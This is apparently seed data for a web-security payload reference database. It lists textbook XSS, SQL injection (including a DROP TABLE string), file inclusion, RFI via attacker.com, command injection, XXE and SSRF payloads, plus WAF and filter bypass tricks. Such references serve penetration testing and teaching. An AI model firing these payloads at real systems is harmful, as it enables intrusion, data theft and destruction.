"""
Initial payload data for populating the database.
Contains example payloads for major vulnerability types.
"""

VULNERABILITY_TYPES = [
    {
        'name': 'XSS',
        'description': 'Cross-Site Scripting - Injection of malicious scripts into web pages',
        'category': 'injection',
        'severity': 'high',
    },
    {
        'name': 'SQLi',
        'description': 'SQL Injection - Injection of malicious SQL code into database queries',
        'category': 'injection',
        'severity': 'critical',
    },
    {
        'name': 'LFI',
        'description': 'Local File Inclusion - Reading local files on the server',
        'category': 'file_inclusion',
        'severity': 'high',
    },
    {
        'name': 'RFI',
        'description': 'Remote File Inclusion - Including remote files in application',
        'category': 'file_inclusion',
        'severity': 'critical',
    },
    {
        'name': 'RCE',
        'description': 'Remote Code Execution - Execute arbitrary code on the server',
        'category': 'code_execution',
        'severity': 'critical',
    },
    {
        'name': 'CSRF',
        'description': 'Cross-Site Request Forgery - Unauthorized commands from trusted user',
        'category': 'authorization',
        'severity': 'medium',
    },
    {
        'name': 'XXE',
        'description': 'XML External Entity - Processing of external entities in XML',
        'category': 'injection',
        'severity': 'high',
    },
    {
        'name': 'SSRF',
        'description': 'Server-Side Request Forgery - Making requests from server-side',
        'category': 'misconfiguration',
        'severity': 'high',
    },
    {
        'name': 'Path Traversal',
        'description': 'Directory Traversal - Access files outside web root',
        'category': 'file_inclusion',
        'severity': 'medium',
    },
    {
        'name': 'Command Injection',
        'description': 'OS Command Injection - Execute system commands',
        'category': 'code_execution',
        'severity': 'critical',
    },
]

PAYLOADS = {
    'XSS': [
        {
            'name': 'Basic Alert',
            'payload_text': '<script>alert(1)</script>',
            'description': 'Simple XSS payload that triggers an alert box',
            'bypass_technique': 'None',
            'platform': 'Web',
        },
        {
            'name': 'Image Tag XSS',
            'payload_text': '<img src=x onerror=alert(1)>',
            'description': 'XSS using image tag with error handler',
            'bypass_technique': 'Tag-based',
            'platform': 'Web',
        },
        {
            'name': 'SVG XSS',
            'payload_text': '<svg/onload=alert(1)>',
            'description': 'XSS using SVG element',
            'bypass_technique': 'SVG-based',
            'platform': 'Web',
        },
        {
            'name': 'Event Handler XSS',
            'payload_text': '<body onload=alert(1)>',
            'description': 'XSS using body onload event',
            'bypass_technique': 'Event-based',
            'platform': 'Web',
        },
        {
            'name': 'JavaScript Protocol',
            'payload_text': 'javascript:alert(1)',
            'description': 'XSS using javascript: protocol',
            'bypass_technique': 'Protocol-based',
            'platform': 'Web',
        },
    ],
    'SQLi': [
        {
            'name': 'Basic OR Injection',
            'payload_text': "' OR '1'='1",
            'description': 'Classic SQL injection to bypass authentication',
            'bypass_technique': 'Logic manipulation',
            'platform': 'Database',
        },
        {
            'name': 'UNION SELECT',
            'payload_text': "' UNION SELECT NULL, NULL, NULL--",
            'description': 'UNION-based SQL injection for data extraction',
            'bypass_technique': 'UNION-based',
            'platform': 'Database',
        },
        {
            'name': 'Time-based Blind',
            'payload_text': "' AND SLEEP(5)--",
            'description': 'Time-based blind SQL injection',
            'bypass_technique': 'Blind injection',
            'platform': 'MySQL',
        },
        {
            'name': 'Error-based',
            'payload_text': "' AND 1=CONVERT(int, (SELECT @@version))--",
            'description': 'Error-based SQL injection to extract information',
            'bypass_technique': 'Error-based',
            'platform': 'MSSQL',
        },
        {
            'name': 'Stacked Queries',
            'payload_text': "'; DROP TABLE users--",
            'description': 'Stacked query injection (dangerous!)',
            'bypass_technique': 'Stacked queries',
            'platform': 'Database',
        },
    ],
    'LFI': [
        {
            'name': 'Basic LFI',
            'payload_text': '../../../etc/passwd',
            'description': 'Basic local file inclusion to read /etc/passwd',
            'bypass_technique': 'Path traversal',
            'platform': 'Linux',
        },
        {
            'name': 'Windows LFI',
            'payload_text': '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
            'description': 'LFI for Windows systems',
            'bypass_technique': 'Path traversal',
            'platform': 'Windows',
        },
        {
            'name': 'Null Byte LFI',
            'payload_text': '../../../etc/passwd%00',
            'description': 'LFI with null byte to bypass extension checks',
            'bypass_technique': 'Null byte',
            'platform': 'Linux',
        },
        {
            'name': 'PHP Wrapper',
            'payload_text': 'php://filter/convert.base64-encode/resource=index.php',
            'description': 'PHP wrapper to read source code',
            'bypass_technique': 'PHP wrapper',
            'platform': 'PHP',
        },
    ],
    'RFI': [
        {
            'name': 'Basic RFI',
            'payload_text': 'http://attacker.com/shell.txt',
            'description': 'Basic remote file inclusion',
            'bypass_technique': 'None',
            'platform': 'Web',
        },
        {
            'name': 'Null Byte RFI',
            'payload_text': 'http://attacker.com/shell.txt%00',
            'description': 'RFI with null byte bypass',
            'bypass_technique': 'Null byte',
            'platform': 'Web',
        },
    ],
    'RCE': [
        {
            'name': 'Basic System Command',
            'payload_text': 'system("whoami");',
            'description': 'Execute system command in PHP',
            'bypass_technique': 'None',
            'platform': 'PHP',
        },
        {
            'name': 'Shell Execution',
            'payload_text': 'shell_exec("cat /etc/passwd");',
            'description': 'Execute shell command in PHP',
            'bypass_technique': 'None',
            'platform': 'PHP',
        },
        {
            'name': 'Python Eval',
            'payload_text': '__import__("os").system("whoami")',
            'description': 'RCE using Python eval',
            'bypass_technique': 'None',
            'platform': 'Python',
        },
    ],
    'CSRF': [
        {
            'name': 'Basic CSRF Form',
            'payload_text': '<form action="http://victim.com/delete" method="POST"><input type="submit" value="Click"></form>',
            'description': 'Basic CSRF attack form',
            'bypass_technique': 'None',
            'platform': 'Web',
        },
        {
            'name': 'CSRF via Image',
            'payload_text': '<img src="http://victim.com/delete?id=1">',
            'description': 'CSRF via image tag',
            'bypass_technique': 'Image-based',
            'platform': 'Web',
        },
    ],
    'XXE': [
        {
            'name': 'Basic XXE',
            'payload_text': '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
            'description': 'Basic XXE to read local files',
            'bypass_technique': 'External entity',
            'platform': 'XML',
        },
        {
            'name': 'XXE SSRF',
            'payload_text': '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-service">]><foo>&xxe;</foo>',
            'description': 'XXE to perform SSRF',
            'bypass_technique': 'SSRF via XXE',
            'platform': 'XML',
        },
    ],
    'SSRF': [
        {
            'name': 'Basic SSRF',
            'payload_text': 'http://localhost:8080/admin',
            'description': 'Basic SSRF to access internal services',
            'bypass_technique': 'None',
            'platform': 'Web',
        },
        {
            'name': 'SSRF with IP encoding',
            'payload_text': 'http://127.0.0.1:8080/',
            'description': 'SSRF using localhost IP',
            'bypass_technique': 'IP encoding',
            'platform': 'Web',
        },
    ],
    'Path Traversal': [
        {
            'name': 'Basic Traversal',
            'payload_text': '../../../../../../etc/passwd',
            'description': 'Basic directory traversal',
            'bypass_technique': 'Path traversal',
            'platform': 'Linux',
        },
        {
            'name': 'Encoded Traversal',
            'payload_text': '..%2f..%2f..%2fetc%2fpasswd',
            'description': 'URL encoded directory traversal',
            'bypass_technique': 'URL encoding',
            'platform': 'Linux',
        },
        {
            'name': 'Double Encoded',
            'payload_text': '..%252f..%252f..%252fetc%252fpasswd',
            'description': 'Double URL encoded traversal',
            'bypass_technique': 'Double encoding',
            'platform': 'Linux',
        },
    ],
    'Command Injection': [
        {
            'name': 'Basic Command Injection',
            'payload_text': '; whoami',
            'description': 'Basic command injection using semicolon',
            'bypass_technique': 'Semicolon separator',
            'platform': 'Linux',
        },
        {
            'name': 'Pipe Injection',
            'payload_text': '| whoami',
            'description': 'Command injection using pipe',
            'bypass_technique': 'Pipe separator',
            'platform': 'Linux',
        },
        {
            'name': 'AND Injection',
            'payload_text': '&& whoami',
            'description': 'Command injection using AND operator',
            'bypass_technique': 'AND separator',
            'platform': 'Linux',
        },
    ],
}

MANIPULATION_TRICKS = {
    'XSS': [
        {
            'name': 'Case Variation',
            'technique': '<ScRiPt>alert(1)</ScRiPt>',
            'description': 'Use mixed case to bypass case-sensitive filters',
            'effectiveness': 'medium',
            'target_defense': 'Case-sensitive filters',
            'example': '<ScRiPt> instead of <script>',
        },
        {
            'name': 'HTML Entity Encoding',
            'technique': '&#60;script&#62;alert(1)&#60;/script&#62;',
            'description': 'Use HTML entities to encode characters',
            'effectiveness': 'high',
            'target_defense': 'Simple string matching',
            'example': '&#60; for <',
        },
        {
            'name': 'Null Byte Injection',
            'technique': '<scri\x00pt>alert(1)</script>',
            'description': 'Insert null bytes to bypass filters',
            'effectiveness': 'low',
            'target_defense': 'String matching filters',
            'example': 'Add \x00 in middle of keywords',
        },
    ],
    'SQLi': [
        {
            'name': 'Comment Bypass',
            'technique': 'UN/**/ION SEL/**/ECT',
            'description': 'Use SQL comments to break up keywords',
            'effectiveness': 'high',
            'target_defense': 'Keyword blacklists',
            'example': 'UN/**/ION instead of UNION',
        },
        {
            'name': 'Case Variation',
            'technique': 'UnIoN sElEcT',
            'description': 'Mix case in SQL keywords',
            'effectiveness': 'medium',
            'target_defense': 'Case-sensitive filters',
            'example': 'UnIoN instead of UNION',
        },
        {
            'name': 'URL Encoding',
            'technique': '%55%4E%49%4F%4E',
            'description': 'URL encode SQL keywords',
            'effectiveness': 'high',
            'target_defense': 'WAF bypass',
            'example': '%55%4E%49%4F%4E for UNION',
        },
    ],
    'LFI': [
        {
            'name': 'URL Encoding',
            'technique': '..%2f..%2fetc%2fpasswd',
            'description': 'URL encode path separators',
            'effectiveness': 'high',
            'target_defense': 'Path validation',
            'example': '%2f for /',
        },
        {
            'name': 'Double URL Encoding',
            'technique': '..%252f..%252fetc%252fpasswd',
            'description': 'Double URL encode for bypass',
            'effectiveness': 'high',
            'target_defense': 'Double decoding systems',
            'example': '%252f for %2f',
        },
        {
            'name': 'Null Byte',
            'technique': '../../../etc/passwd%00',
            'description': 'Use null byte to truncate extension',
            'effectiveness': 'medium',
            'target_defense': 'Extension checks',
            'example': 'Add %00 at end',
        },
    ],
    'Path Traversal': [
        {
            'name': 'Alternative Separators',
            'technique': '..\\..\\..\\etc\\passwd',
            'description': 'Use backslashes on Windows or mixed separators',
            'effectiveness': 'medium',
            'target_defense': 'Forward slash filters',
            'example': '\\ instead of /',
        },
        {
            'name': 'Absolute Path',
            'technique': '/etc/passwd',
            'description': 'Use absolute path if relative is blocked',
            'effectiveness': 'low',
            'target_defense': 'Relative path checks',
            'example': '/etc/passwd directly',
        },
    ],
    'Command Injection': [
        {
            'name': 'Alternative Separators',
            'technique': '|, ||, &, &&, ;, \n',
            'description': 'Try different command separators',
            'effectiveness': 'high',
            'target_defense': 'Semicolon filters',
            'example': 'Use | instead of ;',
        },
        {
            'name': 'Inline Execution',
            'technique': '`whoami` or $(whoami)',
            'description': 'Use command substitution',
            'effectiveness': 'high',
            'target_defense': 'Basic command filters',
            'example': '`whoami` for inline execution',
        },
    ],
}

ENCODING_TECHNIQUES = [
    {
        'name': 'URL Encoding',
        'description': 'Encode special characters as %XX hexadecimal',
        'encoding_type': 'url',
        'is_reversible': True,
    },
    {
        'name': 'Double URL Encoding',
        'description': 'Apply URL encoding twice for double-decoding systems',
        'encoding_type': 'url',
        'is_reversible': True,
    },
    {
        'name': 'Base64',
        'description': 'Encode to Base64 format',
        'encoding_type': 'base64',
        'is_reversible': True,
    },
    {
        'name': 'Hexadecimal',
        'description': 'Convert to hexadecimal representation',
        'encoding_type': 'hex',
        'is_reversible': True,
    },
    {
        'name': 'Unicode Escape',
        'description': 'Encode as Unicode escape sequences',
        'encoding_type': 'unicode',
        'is_reversible': True,
    },
    {
        'name': 'HTML Entity',
        'description': 'Encode as HTML entities',
        'encoding_type': 'html',
        'is_reversible': True,
    },
    {
        'name': 'HTML Numeric Entity',
        'description': 'Encode as HTML numeric entities (&#XX;)',
        'encoding_type': 'html',
        'is_reversible': True,
    },
    {
        'name': 'Octal',
        'description': 'Encode as octal escape sequences',
        'encoding_type': 'octal',
        'is_reversible': True,
    },
    {
        'name': 'ROT13',
        'description': 'Simple Caesar cipher rotation by 13',
        'encoding_type': 'substitution',
        'is_reversible': True,
    },
]
